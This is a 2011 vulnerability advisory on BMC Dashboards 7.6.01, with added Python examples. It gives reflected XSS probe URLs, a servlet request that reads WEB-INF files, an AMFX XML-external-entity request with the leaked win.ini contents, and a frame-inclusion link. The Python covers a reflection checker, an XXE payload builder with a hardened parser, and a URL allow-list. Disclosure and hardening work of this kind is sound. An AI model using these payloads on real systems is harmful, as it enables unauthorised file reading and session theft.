BMC Dashboards 7.6.01 XSS / File Reading

Posted May 5, 2011
Authored by ProCheckUp, Richard Brain, Jan Fry | Site procheckup.com

BMC Dashboards version 7.6.01 suffers from cross site scripting and arbitrary file reading vulnerabilities.

tags | exploit, arbitrary, vulnerability, xss
SHA-256 | 94e598cb8a417f4029046945b2b6cbe27cca569b5151f8df4790880703c96972

PR10-18: Multiple XSS (Cross Site Scripting) and arbitrary file reading
flaws within BMC Dashboards by BMC

Vulnerability found: 1st Oct 2010

Vendor informed:

Vulnerability fixed:

Severity: High

Description:

BMC Dashboards provides service desk analysts with a dashboard view of
aggregated performance indicators, enabling timely fact-based decisions.
ProCheckUp has discovered that multiple BMC Dashboards pages (the
bmc_help2u help services and the bsmdashboards AMF endpoint) are
vulnerable to reflected XSS attacks, that a help servlet returns any file
within the web-root, and that the AMF endpoint resolves XML external
entities, which allows arbitrary files to be read from outside the
web-root.

Version: 7.6.01 - http://www.bmc.com/

1) The following demonstrate the reflected XSS flaws; in each case the
injected script is returned unencoded in the page

a)
https://target-domain.foo/bmc_help2u/help_services/html/xx/<script>alert(1)</script>404.htm

b)
https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp&msg="><script>alert(1)</script>

c) Multiple XSS within the demo pages shipped with the help services
https://target-domain.foo/bmc_help2u/help_services/demos/helpTest.jsp?help='><script>alert(1)</script>

https://target-domain.foo/bmc_help2u/help_services/demos/setChromeDef.jsp?bFlag=<script>alert(1)</script>&submitVals=Call+setChromeDefBoolean

d) Multiple XSS as the AMF stream is unfiltered: the requested method
name is echoed unencoded in the fault message. Note that the reply is
served as application/x-amf, so the payload is only rendered as HTML if
a client displays the faultString in an HTML context; on its own this is
unvalidated reflection of attacker input rather than a browser-triggered
XSS.

POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Content-Type: application/x-amf
Host: target-domain.foo
Content-Length: 462
........null../58..... ..
.COflex.messaging.messages.RemotingMessage.timestamp.headers.operation

bodysource.remotePassword.remoteUsername.parameters.messageId.timeToLive.clientId.destination.........
#.
DSId.DSEndpoint.IFDCEEFC2-F318-1B37-7F3A-B438E60525E0..bsd-secure-amf...getUndefinedDataSources<script>alert(1)</script>
..
.qcom.bmc.bsm.dashboards.services.facade.RequestParameters.
#. name.version..208Archive..1.0...
.Cflex.messaging.io.ArrayCollection ..
..I3DDF906B-55F2-5E38-38C1-6A08D1AC077B..........IFDDDB883-6F0C-D935-5E7B-25CDF25C3538.-dashboardArchiveFacade

Result:
HTTP/1.1 200 OK
Date: Sat, 02 Oct 2010 00:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: application/x-amf
Content-Length: 4651

......../58/onStatus.......
.SIflex.messaging.messages.ErrorMessage.headers.rootCause
body.correlationId.faultDetail.faultString.clientId.timeToLive.destination.timestamp.extendedData.faultCode.messageId
..
..acom.bmc.bsm.dashboards.util.logging.BSDException.message
guid!localizedMessage.cause.arguments.priority.traceback.errorCode.causeSummary.System
error. Contact your system administrator for assistance.
.Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifier.AdZZZZZZZZJIiCvq53w9q0gerq4j8y0oq.0
.s?flex.messaging.MessageException.errorMessage."$)logStackTraceEnablednumber

codelogged.statusCode..-defaultLogMessageIntro.details#preferredLogLevel+rootCauseErrorMessage
.
......)Method 'getUndefinedDataSources<script>alert(1)</script>' not
found...1Cannot invoke method 'getUndefinedDataSourcesfdd4d

Consequences:
An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link to a BMC Dashboards based
site. Such code would run within the security context of the target
domain. This type of attack can result in non-persistent defacement of
the target site, or the redirection of confidential information (e.g.
session IDs) to unauthorised third parties. No authentication is
required to exploit this vulnerability.
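A marker-based reflection check for the probes in section 1, added here as an example and not part of ProCheckUp's advisory or of the BMC product: the two server responses at the bottom are constructed stand-ins (one echoing the request path raw, one HTML-encoding it), the probe URL shapes follow 1a to 1c above, and the "pcu" token prefix is an arbitrary choice.

```python
"""Marker-based reflection check for the reflected XSS probes in section 1.
Added example; the two HTTP responses at the bottom are constructed stand-ins
for the target, not captured output."""
import html
import secrets
from urllib.parse import quote


def make_marker(token=None):
    """A tag carrying a random token: a hit cannot be static page content,
    and the angle brackets test exactly what a <script> payload needs."""
    token = token or secrets.token_hex(4)
    return "<pcu" + token + ">", token


def build_probe_urls(base, marker):
    """Probe URLs shaped like 1a to 1c of the advisory, marker URL-encoded."""
    m = quote(marker, safe="")
    return {
        "1a_help_404_path": base + "/bmc_help2u/help_services/html/xx/" + m + "404.htm",
        "1b_helpServlet2u_msg": base + "/bmc_help2u/servlet/helpServlet2u"
        "?textareaWrap=/bmc_help2u/help_services/demos/frameTst/my0a.jsp"
        "&msg=" + quote('">' + marker, safe=""),
        "1c_helpTest_help": base + "/bmc_help2u/help_services/demos/helpTest.jsp"
        "?help=" + quote("'>" + marker, safe=""),
    }


def classify_reflection(body, marker, token):
    """raw: reflected with < and > intact, so a <script> tag would survive;
    encoded: reflected as &lt;...&gt; (output encoding is in place);
    altered: token present but the tag did not survive (stripped or otherwise
    encoded), worth a manual look; absent: not reflected at all."""
    if marker in body:
        return "raw"
    if html.escape(marker) in body:
        return "encoded"
    if token in body:
        return "altered"
    return "absent"


# Constructed responses standing in for the help_services 404 handler.
def _vulnerable_404(path):
    return "<html><body>Page " + path + " was not found.</body></html>"


def _hardened_404(path):
    return ("<html><body>Page " + html.escape(path, quote=True)
            + " was not found.</body></html>")


def demo(token="deadbeef"):
    """Run the check against both constructed responses for probe 1a."""
    marker, tok = make_marker(token)
    injected_path = "/bmc_help2u/help_services/html/xx/" + marker + "404.htm"
    return {
        "urls": build_probe_urls("https://target-domain.foo", marker),
        "vulnerable": classify_reflection(_vulnerable_404(injected_path), marker, tok),
        "hardened": classify_reflection(_hardened_404(injected_path), marker, tok),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, verdict)
```

Against a live host the constructed responses would be replaced by the bodies fetched from build_probe_urls(); the random token keeps a stale cache or a static page from being misread as a hit, and the "altered" verdict is the one that deserves a manual look, since a filter that only strips tags is usually bypassable.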

2) Application is vulnerable to file source code reading, limited to the
web-root: the textareaWrap parameter of helpServlet2u returns the named
file, including files under WEB-INF that the container would otherwise
never serve.

https://target-domain.foo/bmc_help2u/servlet/helpServlet2u?textareaWrap=/bmc_help2u/WEB-INF/web.xml

Consequences:
File source code reading allows files (JSP source, web.xml and other
configuration) to be retrieved from the target server, provided that the
location within the web-root is known. No authentication is required to
exploit this vulnerability.

3) Verbose error pages when parsing malformed AMF messages: the fault
returned to the client carries the full Java stack trace, the install
path (c:\Program Files\BMC Software\BMCDashboardsForBSM\...) and shows
that the request-supplied archive name and version are concatenated into
a file-system path.
POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1
Host: target-domain.foo
Content-Type: application/x-amf
Content-Length: 462

COflex.messaging.messages.RemotingMessagetimestampheadersoperation body
sourceremotePasswordremoteUsernameparametersmessageIdtimeToLiveclientIddestination

SIflex.messaging.messages.ErrorMessageheadersrootCause bodycorrelationIdfaultDetailfaultStringclientIdtimeToLivedestinationtimestampextendedDatafaultCodemessageId

acom.bmc.bsm.dashboards.util.logging.BSDExceptionmessage guid!localizedMessage causeargumentsprioritytracebackerrorCodecauseSummarySystem
error. Contact your system administrator for assistance.
Kcom.bmc.bsm.dashboards.util.guid.Guid!uniqueIdentifierAdZZZZZZZZJIiCvq53w9q0gerq4j8y0n80
3;java.io.FileNotFoundException"$?cf:\Program Files\BMC
Software\BMCDashboardsForBSM\BSMDashboards\archive\208Archive_1.025350<a>d026634a338.dar
(The filename, directory name, or volume label syntax is
incorrect): ERRORÇecom.bmc.bsm.dashboards.util.logging.BSDException: System
error. Contact your system administrator for assistance.
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchiveHelper(DashboardArchiveFacadeImpl.java:585)
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.readArchive(DashboardArchiveFacadeImpl.java:526)
at
com.bmc.bsm.dashboards.archive.DashboardArchiveFacadeImpl.getUndefinedDataSources(DashboardArchiveFacadeImpl.java:193)
at sun.reflect.GeneratedMethodAccessor767.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl$1.run(TransactionInvocationHandlerImpl.java:66)
at
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:117)
at
com.bmc.bsm.dashboards.util.transaction.TransactionHelperImpl.runInTransaction(TransactionHelperImpl.java:107)
at
com.bmc.bsm.dashboards.util.transaction.TransactionInvocationHandlerImpl.invoke(TransactionInvocationHandlerImpl.java:60)
at $Proxy54.getUndefinedDataSources(Unknown Source)


4) Vulnerable to arbitrary file reading outside the web-root because the
product embeds Adobe BlazeDS, whose AMFX (XML-encoded AMF) endpoint
resolves XML external entities; see
http://seclists.org/fulldisclosure/2010/Feb/383. The SYSTEM entity below
uses a relative path, which the server resolves against the working
directory of the application server process.

POST /bsmdashboards/messagebroker/amfsecure HTTP/1.1

Host: target-domain.foo
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10)
Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0C)
Content-type: application/x-amf

POST DATA
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "../win.ini"> ]>
<amfx ver="3"><body>
<object type="flex.messaging.messages.CommandMessage">
<traits>

<string>body</string><string>clientId</string><string>correlationId</string>

<string>destination</string><string>headers</string><string>messageId</string>

<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>


win.ini
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
aif=MPEGVideo
aifc=MPEGVideo
aiff=MPEGVideo
asf=MPEGVideo
asx=MPEGVideo
au=MPEGVideo
m1v=MPEGVideo
m3u=MPEGVideo
mp2=MPEGVideo
mp2v=MPEGVideo
mp3=MPEGVideo
mpa=MPEGVideo
mpe=MPEGVideo
mpeg=MPEGVideo
mpg=MPEGVideo
mpv2=MPEGVideo
snd=MPEGVideo
wax=MPEGVideo
wm=MPEGVideo
wma=MPEGVideo
wmv=MPEGVideo
wmx=MPEGVideo
wpl=MPEGVideo
wvx=MPEGVideo

Consequences:
The external entity allows files to be retrieved from the target server
outside the web-root, with the privileges of the application server
process, provided that the location on the file system is known.
ProCheckUp expected arbitrary file uploading to be possible as well,
although this was not demonstrated. No authentication is required to
exploit this vulnerability.
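The AMFX request of section 4, generalised to an arbitrary path, with the vulnerable and the hardened parser behaviour side by side. This is an added example and not ProCheckUp's or BMC's code: the target file is a constructed stand-in for win.ini written to a temporary file, and the entity-resolving parser only imitates what the BlazeDS endpoint did, since the real server-side code is not on this page.

```python
"""AMFX XXE from section 4: build the payload for any path, then parse it the
way the vulnerable BlazeDS endpoint did (resolving SYSTEM entities) and the
way a hardened deployment should (refusing any DOCTYPE).  Added example;
the target file in demo() is a constructed stand-in for win.ini."""
import os
import tempfile
import xml.parsers.expat

# Same CommandMessage as the advisory; {path} becomes the SYSTEM identifier.
AMFX_TEMPLATE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "{path}"> ]>
<amfx ver="3"><body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
"""


def build_amfx_xxe(path):
    """Payload whose messageId value is the external entity.  The server
    copies the request messageId into the correlationId of its reply, which is
    how the file content travels back to the attacker."""
    return AMFX_TEMPLATE.format(path=path)


def parse_amfx_strings(payload, resolve_entities):
    """Collect every <string> value in document order.
    resolve_entities=True imitates the vulnerable parser: the SYSTEM
    identifier is opened and its bytes are spliced in as entity content.
    resolve_entities=False is the hardened behaviour: any DOCTYPE aborts."""
    parser = xml.parsers.expat.ParserCreate()
    strings, current, in_string = [], [], [False]

    def start(name, attrs):
        if name == "string":
            in_string[0] = True
            current.clear()

    def end(name):
        if name == "string":
            strings.append("".join(current))
            in_string[0] = False

    def chars(data):
        if in_string[0]:
            current.append(data)

    def external_entity(context, base, system_id, public_id):
        # The child parser inherits the handlers, so the file text lands in
        # `current` exactly as if it had been typed inside <string>.
        child = parser.ExternalEntityParserCreate(context)
        with open(system_id, "rb") as fh:
            child.Parse(fh.read(), True)
        return 1

    def doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE is not permitted in AMFX messages")

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    if resolve_entities:
        parser.ExternalEntityRefHandler = external_entity
    else:
        parser.StartDoctypeDeclHandler = doctype
    parser.Parse(payload.encode("utf-8"), True)
    return strings


def leaked_message_id(strings):
    """The entity sits in the last <string> of the message (messageId)."""
    return strings[-1]


def demo():
    """Write a constructed stand-in for win.ini, pull it through the
    entity-resolving parser and return the leaked text."""
    with tempfile.NamedTemporaryFile("w", suffix=".ini", delete=False) as fh:
        fh.write("; for 16-bit app support\n[fonts]\n[extensions]\n")
        target = fh.name
    try:
        payload = build_amfx_xxe(target)
        return leaked_message_id(parse_amfx_strings(payload, True))
    finally:
        os.unlink(target)


if __name__ == "__main__":
    print(demo())
```

The hardened branch rejects the message at the DOCTYPE rather than merely declining to resolve the entity: silently skipping &x3; would still let the request through, and a message format that never legitimately carries a DTD has no reason to accept one.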

5) Application is vulnerable to remote frame inclusion: the URL parameter
of index.htm is placed into a frame source without being restricted to
the application's own pages

https://target-domain.foo/bmc_help2u/help_services/html/index.htm?&URL=http://www.procheckup.com

Consequences:
An attacker may be able to gain access to confidential data by carrying
out a phishing attack: a link to the legitimate host frames an
attacker-controlled page inside the product's help interface.
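An allow-list check for a frame-target parameter such as the URL parameter of index.htm in section 5, added as an example and not BMC's code: the product's real parameter handling is not on this page, and the /bmc_help2u/ prefix and the default page are assumptions.

```python
"""Allow-list check for a frame-target parameter such as URL on
bmc_help2u/help_services/html/index.htm (section 5).  Added example, not
BMC's code; the help prefix and the default page are assumptions."""
from urllib.parse import unquote, urlsplit

HELP_PREFIX = "/bmc_help2u/"                                   # assumed
DEFAULT_TARGET = "/bmc_help2u/help_services/html/welcome.htm"  # assumed


def safe_frame_target(value, prefix=HELP_PREFIX, default=DEFAULT_TARGET):
    """Return value only if it is a same-origin path inside the help tree,
    otherwise the default.  Rejected: any scheme (http:, javascript:, data:),
    any authority (//evil.example), backslashes (browsers read them as
    slashes), control characters, and dot segments, percent-encoded or not."""
    if not isinstance(value, str) or not value:
        return default
    if any(ord(c) < 0x20 or c == "\\" for c in value):
        return default
    try:
        parts = urlsplit(value)
    except ValueError:
        return default
    if parts.scheme or parts.netloc:
        return default
    path = parts.path
    if not path.startswith(prefix) or ".." in unquote(path).split("/"):
        return default
    return value


if __name__ == "__main__":
    for candidate in ("http://www.procheckup.com", "//www.procheckup.com/",
                      "/bmc_help2u/help_services/html/intro.htm"):
        print(candidate, "->", safe_frame_target(candidate))
```

The check has to run server-side, before the frame src is written into the page; client-side validation of the same parameter can be bypassed by linking straight to the framed URL.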

Fix:

References:
http://www.procheckup.com/Vulnerabilities.php

Credits: Richard Brain and Jan Fry of ProCheckUp Ltd (www.procheckup.com)

Legal:
Copyright 2010 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if, the Bulletin is not edited or changed in any way, is attributed
to Procheckup, and provided such reproduction and/or distribution is
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.

